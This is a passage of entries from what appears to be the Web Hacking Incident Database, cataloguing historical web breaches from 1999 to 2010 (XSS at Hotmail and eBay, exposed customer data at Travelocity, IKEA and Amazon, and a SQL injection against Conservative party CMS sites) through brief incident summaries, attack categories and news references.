Incident Description: The privacy hole affected users who logged on to the Verizon Wireless Web site and used the My Account feature to view or change their cell phone billing and account information. The Web site address for the feature assigns session identifications sequentially as each user logs in which allows for forceful browsing.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.computerworld.com/securitytopics/security/privacy/story/0,10801,63587,00.html
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2001-4: Hacked Web site damaged PCs in Japan
WHID ID: 2001-4
Date Occured:
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Planting of Malware
Attacked Entity Field:
Attacked Entity Geography:
Incident Description: Users who visited the Price Lotto site using Microsoft's IE (Internet Explorer) 4.x and 5.x, automatically downloaded malicious JavaScript that was programmed to alter the software configuration of their PCs.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.infoworld.com/articles/hn/xml/01/08/21/010821hnjapmal.html?&_ref=1024727153
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2001-3: Persistent XSS in Hotmail
WHID ID: 2001-3
Date Occured:
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Disclosure Only
Attacked Entity Field:
Attacked Entity Geography:
Incident Description: Persistent XSS HTML Injection inside an HTML email message to hotmail
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.usatoday.com/tech/news/2001-08-31-hotmail-security.htm
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2001-2: Computer E-Retailer Exposes Credit Card Numbers
WHID ID: 2001-2
Date Occured:
Attack Method: Predictable Resource Location
Application Weakness: Insufficient Authorization
Outcome: Disclosure Only
Attacked Entity Field:
Attacked Entity Geography:
Incident Description: View other orders by changing a sequential parameter number. Security was provided by client side JavaScript
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.extremetech.com/article2/0,3973,103782,00.asp
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2001-1: Travelocity exposes customer information
WHID ID: 2001-1
Date Occured:
Attack Method: Predictable Resource Location
Application Weakness: Insufficient Authorization
Outcome: Disclosure Only
Attacked Entity Field:
Attacked Entity Geography:
Incident Description: Sensitive files were left in a publicly accessible directory of a new web server install
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://news.com.com/2100-1017-251344.html?legacy=cnet
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2000-6: Inforeading.com defacement using command injection
WHID ID: 2000-6
Date Occured:
Attack Method: OS Commanding
Application Weakness:
Outcome:
Attacked Entity Field:
Attacked Entity Geography:
Incident Description: Executing local commands using URL parameters
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.inforeading.com/library/infoarticles/InfoReading/logs/deface/02.txt
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2000-5: Eve.com exposes customers order information
WHID ID: 2000-5
Date Occured:
Attack Method: Credential/Session Prediction
Application Weakness:
Outcome:
Attacked Entity Field:
Attacked Entity Geography:
Incident Description: View other customers orders by changing a sequential number within a URL parameter
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://news.com.com/2100-1017-245700.html?legacy=cnet
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2000-4: Sensitive files left unprotected on Western Union's Web
WHID ID: 2000-4
Date Occured:
Attack Method:
Application Weakness:
Outcome:
Attacked Entity Field:
Attacked Entity Geography: USA
Incident Description: Sensitive files were left in a publicly accessible directory during a maintenance window
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://news.com.com/2100-1023-245525.html?legacy=cnet
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2000-3: Gaffe at Amazon leaves email addresses exposed
WHID ID: 2000-3
Date Occured:
Attack Method: Abuse of Functionality
Application Weakness:
Outcome:
Attacked Entity Field:
Attacked Entity Geography: USA
Incident Description: E-mail addresses of other customers displayed by mistake, no hacking was required
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://news.com.com/2100-1017-245387.html?legacy=cnet
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2000-2: IKEA exposes customer information on catalog site
WHID ID: 2000-2
Date Occured:
Attack Method: Unintentional Information Disclosure
Application Weakness: Insufficient Authentication
Outcome: Leakage of Information
Attacked Entity Field: Retail
Attacked Entity Geography:
Incident Description: Error message revealed a database file location, which could be downloaded.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://news.com.com/2100-1017-245372.html?legacy=cnet
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 1999-1: eBay downplays security hole
WHID ID: 1999-1
Date Occured: 4/4/2006
Attack Method: Cross Site Scripting (XSS)
Application Weakness:
Outcome:
Attacked Entity Field:
Attacked Entity Geography: USA
Incident Description: A very early XSS issue at eBay. Interesting historically as it seems that at the time the term XSS was not yet in use.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://packetstormsecurity.org/9904-exploits/ebayla.txt
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: Conservative party web CMS system hacked
WHID ID:
Date Occured: 10/16/2010
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Defacement
Attacked Entity Field: Politics
Attacked Entity Geography: United Kingdom
Incident Description: SQL injection flaw in CMS system allowed admin access to many smaller individual and regional Conservative party web sites (the main site www.conservatives.com was unaffected). The password field for the CMS login page was susceptible to a SQL injection attack allowing access to arbitrary user accounts including the CMS administrator account. The CMS controlled content access to the content of a number of sites run by the Conservative party, many of which are used by regional party groups. The websites have remained down since the attack, including: http://www.bathconservatives.com/ http://www.newtonabbotconservatives.org.uk/ http://www.nwdurhamconservatives.com/ http://www.nwnorfolkconservatives.com/ Details of the flaw were posted on several message boards and rapid and widespread defacement occured, ranging from political satire to hate speak.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected: 20
Reference: http://editor.conservatives.org.uk/cms/v6/cms.admin.php
Attack Source Geography: Multiple sources
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link: